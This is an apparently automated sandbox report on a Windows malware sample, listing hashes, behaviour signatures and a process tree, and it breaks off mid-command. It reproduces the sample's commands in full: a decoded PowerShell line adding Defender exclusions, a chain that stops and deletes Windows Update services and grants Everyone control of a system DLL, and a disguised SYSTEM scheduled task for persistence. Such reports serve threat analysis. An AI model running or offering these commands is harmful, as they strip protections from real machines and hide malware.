Analysis
- max time kernel: 306s
- max time network: 324s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 10-05-2022 22:15
- Static task: static1
- Behavioral task: behavioral1
- Sample: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
- Resource: win7-20220414-en
General
- Target: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
- Size: 2.0MB
- MD5: 79dbc1a54d33366681f1e926d565cad4
- SHA1: 907cf0ec6784bf140f9759d6931d3697da0fc229
- SHA256: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
- SHA512: 6d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
Malware Config
Signatures
Modifies security service (2 TTPs, 5 IoCs)
Processes: reg.exe
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
Executes dropped EXE (1 IoC)
Processes: services.exe
- PID 4936 services.exe
Possible privilege escalation attempt (4 IoCs)
Processes: icacls.exe, icacls.exe, takeown.exe, takeown.exe
- PID 3700 icacls.exe
- PID 3864 icacls.exe
- PID 4832 takeown.exe
- PID 1384 takeown.exe
Stops running service(s) (3 TTPs)
Modifies file permissions (1 TTP, 4 IoCs)
Processes: takeown.exe, icacls.exe, icacls.exe, takeown.exe
- PID 1384 takeown.exe
- PID 3700 icacls.exe
- PID 3864 icacls.exe
- PID 4832 takeown.exe
Drops file in System32 directory (3 IoCs)
Processes: powershell.exe, conhost.exe
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of SetThreadContext (1 IoC)
Processes: conhost.exe
- PID 4568 conhost.exe set thread context of PID 4924 conhost.exe
Drops file in Program Files directory (2 IoCs)
Processes: conhost.exe
- File created: C:\Program Files\Windows\services.exe (conhost.exe)
- File opened for modification: C:\Program Files\Windows\services.exe (conhost.exe)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS (52 IoCs)
Processes: powershell.exe, conhost.exe
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (conhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
Modifies registry key (1 TTP, 18 IoCs)
Processes: reg.exe (18 instances)
- PID 1876 reg.exe
- PID 5104 reg.exe
- PID 2600 reg.exe
- PID 4984 reg.exe
- PID 2884 reg.exe
- PID 5092 reg.exe
- PID 2144 reg.exe
- PID 1892 reg.exe
- PID 2860 reg.exe
- PID 3500 reg.exe
- PID 2488 reg.exe
- PID 4688 reg.exe
- PID 4084 reg.exe
- PID 4844 reg.exe
- PID 4976 reg.exe
- PID 4880 reg.exe
- PID 3344 reg.exe
- PID 1920 reg.exe
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, conhost.exe, powershell.exe, conhost.exe
- PID 4452 powershell.exe
- PID 4452 powershell.exe
- PID 4452 powershell.exe
- PID 3952 conhost.exe
- PID 516 powershell.exe
- PID 516 powershell.exe
- PID 516 powershell.exe
- PID 4568 conhost.exe
Suspicious use of AdjustPrivilegeToken (39 IoCs)
Processes: powershell.exe, conhost.exe, schtasks.exe, powershell.exe, conhost.exe, takeown.exe
- Token: SeDebugPrivilege (PID 4452 powershell.exe)
- Token: SeIncreaseQuotaPrivilege (PID 4452 powershell.exe)
- Token: SeSecurityPrivilege (PID 4452 powershell.exe)
- Token: SeTakeOwnershipPrivilege (PID 4452 powershell.exe)
- Token: SeLoadDriverPrivilege (PID 4452 powershell.exe)
- Token: SeSystemProfilePrivilege (PID 4452 powershell.exe)
- Token: SeSystemtimePrivilege (PID 4452 powershell.exe)
- Token: SeProfSingleProcessPrivilege (PID 4452 powershell.exe)
- Token: SeIncBasePriorityPrivilege (PID 4452 powershell.exe)
- Token: SeCreatePagefilePrivilege (PID 4452 powershell.exe)
- Token: SeBackupPrivilege (PID 4452 powershell.exe)
- Token: SeRestorePrivilege (PID 4452 powershell.exe)
- Token: SeShutdownPrivilege (PID 4452 powershell.exe)
- Token: SeDebugPrivilege (PID 4452 powershell.exe)
- Token: SeSystemEnvironmentPrivilege (PID 4452 powershell.exe)
- Token: SeRemoteShutdownPrivilege (PID 4452 powershell.exe)
- Token: SeUndockPrivilege (PID 4452 powershell.exe)
- Token: SeManageVolumePrivilege (PID 4452 powershell.exe)
- Token: 33 (PID 4452 powershell.exe)
- Token: 34 (PID 4452 powershell.exe)
- Token: 35 (PID 4452 powershell.exe)
- Token: 36 (PID 4452 powershell.exe)
- Token: SeDebugPrivilege (PID 3952 conhost.exe)
- Token: SeTakeOwnershipPrivilege (PID 1384 schtasks.exe)
- Token: SeDebugPrivilege (PID 516 powershell.exe)
- Token: SeAssignPrimaryTokenPrivilege (PID 516 powershell.exe)
- Token: SeIncreaseQuotaPrivilege (PID 516 powershell.exe)
- Token: SeSecurityPrivilege (PID 516 powershell.exe)
- Token: SeTakeOwnershipPrivilege (PID 516 powershell.exe)
- Token: SeLoadDriverPrivilege (PID 516 powershell.exe)
- Token: SeSystemtimePrivilege (PID 516 powershell.exe)
- Token: SeBackupPrivilege (PID 516 powershell.exe)
- Token: SeRestorePrivilege (PID 516 powershell.exe)
- Token: SeShutdownPrivilege (PID 516 powershell.exe)
- Token: SeSystemEnvironmentPrivilege (PID 516 powershell.exe)
- Token: SeUndockPrivilege (PID 516 powershell.exe)
- Token: SeManageVolumePrivilege (PID 516 powershell.exe)
- Token: SeDebugPrivilege (PID 4568 conhost.exe)
- Token: SeTakeOwnershipPrivilege (PID 4832 takeown.exe)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, services.exe
- PID 3220 (465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe) wrote to memory of PID 3952 (conhost.exe)
- PID 3220 (465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe) wrote to memory of PID 3952 (conhost.exe)
- PID 3220 (465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe) wrote to memory of PID 3952 (conhost.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 4464 (cmd.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 4464 (cmd.exe)
- PID 4464 (cmd.exe) wrote to memory of PID 4452 (powershell.exe)
- PID 4464 (cmd.exe) wrote to memory of PID 4452 (powershell.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 2992 (cmd.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 2992 (cmd.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4120 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4120 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 5112 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 5112 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4828 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4828 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3080 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3080 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1972 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1972 (sc.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4984 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4984 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1876 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1876 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 2884 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 2884 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4084 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4084 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4844 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4844 (reg.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 3536 (cmd.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 3536 (cmd.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1384 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1384 (schtasks.exe)
- PID 3536 (cmd.exe) wrote to memory of PID 4720 (schtasks.exe)
- PID 3536 (cmd.exe) wrote to memory of PID 4720 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3700 (icacls.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3700 (icacls.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 3736 (cmd.exe)
- PID 3952 (conhost.exe) wrote to memory of PID 3736 (cmd.exe)
- PID 3736 (cmd.exe) wrote to memory of PID 4440 (schtasks.exe)
- PID 3736 (cmd.exe) wrote to memory of PID 4440 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3344 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3344 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4880 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4880 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4976 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4976 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 5092 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 5092 (reg.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4540 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4540 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3320 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3320 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4328 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4328 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4068 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4068 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1780 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 1780 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3248 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 3248 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4380 (schtasks.exe)
- PID 2992 (cmd.exe) wrote to memory of PID 4380 (schtasks.exe)
- PID 4936 (services.exe) wrote to memory of PID 4568 (conhost.exe)
Processes (indented by depth in the process tree)
(depth 1) C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe
  Command: "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
  - Suspicious use of WriteProcessMemory
  (depth 2) C:\Windows\System32\conhost.exe
    Command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
      Note: the -EncodedCommand argument is base64 of UTF-16LE text and decodes to: <#ht#> Add-MpPreference <#cq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#lqvj#> -Force <#zhf#> (adds Windows Defender path exclusions for the user profile and the system drive; the <#...#> tokens are empty PowerShell block comments)
      - Suspicious use of WriteProcessMemory
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - Suspicious use of WriteProcessMemory
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\takeown.exe
        Command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        - Modifies security service
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\icacls.exe
        Command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        - Possible privilege escalation attempt
        - Modifies file permissions
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        - Modifies registry key
      (depth 4) C:\Windows\system32\reg.exe
        Command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        - Modifies registry key
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
      - Suspicious use of WriteProcessMemory
      (depth 4) C:\Windows\system32\schtasks.exe
        Command: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        - Creates scheduled task(s)
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      - Suspicious use of WriteProcessMemory
(depth 1) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command: powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop dosvc
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop bits
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop wuauserv
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop WaaSMedicSvc
(depth 1) C:\Windows\system32\sc.exe
  Command: sc stop UsoSvc
(depth 1) C:\Windows\system32\schtasks.exe
  Command: schtasks /run /tn "GoogleUpdateTaskMachineQC"
(depth 1) C:\Program Files\Windows\services.exe
  Command: "C:\Program Files\Windows\services.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  (depth 2) C:\Windows\System32\conhost.exe
    Command: "C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBsAHEAdgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAaABmACMAPgA="
    (depth 3) C:\Windows\System32\conhost.exe
      Command: C:\Windows\System32\conhost.exe
      (depth 4) C:\Windows\System32\conhost.exe
        Command: "C:\Windows\System32\conhost.exe" "dycqfudelnyzo"
    (depth 3) C:\Windows\System32\cmd.exe
      Command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN 